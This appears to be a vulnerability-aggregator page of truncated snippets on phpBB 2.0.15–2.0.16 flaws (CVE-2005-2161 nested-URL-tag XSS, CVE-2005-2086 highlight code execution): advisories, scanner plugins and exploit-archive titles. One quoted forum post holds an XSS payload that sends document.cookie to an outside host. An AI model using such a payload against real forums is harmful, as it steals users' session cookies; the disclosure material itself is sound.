CVE-2005-2161

Cross-site scripting XSS vulnerability in phpBB 2.0.16 allows remote attackers to inject arbitrary web script or HTML via nested url tags...

CVE-2005-2161

The CVE-2005-2161 entry covers a cross-site scripting (XSS) vulnerability in phpBB 2.0.16 that allows remote attackers to inject arbitrary script or HTML via nested [url] tags. Connected sources confirm phpBB2 exposure and the Debian security advisory DSA-768-1 (and related Debian/NVD entries) de...

CVE-2005-2161

Cross-site scripting XSS vulnerability in phpBB 2.0.16 allows remote attackers to inject arbitrary web script or HTML via nested url tags...

CVE-2005-2161

Cross-site scripting XSS vulnerability in phpBB 2.0.16 allows remote attackers to inject arbitrary web script or HTML via nested url tags...

phpBB < 2.0.17 Nested BBCode URL Tags XSS

Binary data 3051.prm...

XSS in nested tag in phpbb 2.0.16

Hi all! Example: color=EFEFEFurlwww.uturl=www.s=''style='font-size:0;color:EFEFEF'styl e='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://antic hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=nullstyle='font-size:0;/u rl/url'/color More info: http://www.securitylab.ru/55612.html and...

phpBB < 2.0.17 Nested BBCode URL Tags XSS

According to its banner, the remote host is running a version of phpBB that fails to sanitize BBCode containing nested URL tags, which enables attackers to cause arbitrary HTML and script code to be executed in a user's browser within the context of the affected site. %NASLMINLEVEL 70300 C Tenabl...

Immunity Canvas: PHPBB_HIGHLIGHT

Name| phpbbhighlight ---|--- CVE| CVE-2005-2086 Exploit Pack| CANVAS Description| phpBB Highlight Notes| CVSS: 7.5 Repeatability: Infinite VENDOR: phpbb.com CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-2086 CVE Name: CVE-2005-2086...

CVE-2005-2086

PHP remote file inclusion vulnerability in viewtopic.php in phpBB 2.0.15 and earlier allows remote attackers to execute arbitrary PHP code...

GLSA-200507-03 : phpBB: Arbitrary command execution

The remote host is affected by the vulnerability described in GLSA-200507-03 phpBB: Arbitrary command execution Ron van Daal discovered that phpBB contains a vulnerability in the highlighting code. Impact : Successful exploitation would grant an attacker unrestricted access to the PHP exec or...

phpBB: Arbitrary command execution

Background phpBB is an Open Source bulletin board package. Description Ron van Daal discovered that phpBB contains a vulnerability in the highlighting code. Impact Successful exploitation would grant an attacker unrestricted access to the PHP exec or system functions, allowing the execution of...

phpBB 2.0.15 (highlight) Database Authentication Details Exploit

No description provided by source. !/usr/bin/perl tested and working /str0ke...

phpBB 2.0.15 - &#039;highlight&#039; Database Authentication Details

!/usr/bin/perl tested and working /str0ke...

phpBB 2.0.15 - highlight Database Authentication Details

phpBB 2.0.15 - highlight Database Authentication Details !/usr/bin/perl tested and working /str0ke...

phpBB 2.0.15 (highlight) Database Authentication Details Exploit

Exploit for unknown platform in category web applications ================================================================ phpBB 2.0.15 highlight Database Authentication Details Exploit ================================================================ !/usr/bin/perl tested and working /str0ke...

phpbb2_0_15.pl.txt

!/usr/bin/perl Wed Jun 29 19:08:04 CEST 2005 [email protected] phpBB 2.0.15 -re-bug in viewtopic.php The complete Open Source Development with CVS: GNU General Public License Book on using CVS effectively \n"; exit1; $ARGV0 = m!http://.?/.?t=\d+!; my $server, $port = split /:/,$1; $port = 80...

CVE-2005-2086

Summary of concrete details (CVE-2005-2086) : The phpBB viewtopic.php vulnerability is an arbitrary code execution flaw affecting phpBB 2.0.4 through 2.0.15 (inclusive). The root cause involves improper handling of the highlight parameter in viewtopic.php, enabling PHP code execution on vulnerabl...

[EXPL] phpBB Remote PHP Code Execution &#40;viewtopic.php 2&#41;

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

phpBB 2.0.15 (highlight) Remote PHP Code Execution

Exploit for unknown platform in category web applications ================================================== phpBB 2.0.15 highlight Remote PHP Code Execution ================================================== tested and working /str0ke !/usr/bin/pyth0n this exploit for phpBB 2.0.15 print "\nphpBB...

Security Advisory - phpBB 2.0.15 PHP-code injection bug

Security Advisory -//- phpBB 2.0.15 PHP-code injection bug Program: phpBB 2.0.15 and older versions Homepage: http://www.phpbb.com Risk: Very High Date: June 28 2005 Title: PHP-code injection bug Type: partial disclosure Author: Ron van Daal :. Vendor notified: June 23 2005 Background: phpBB is a...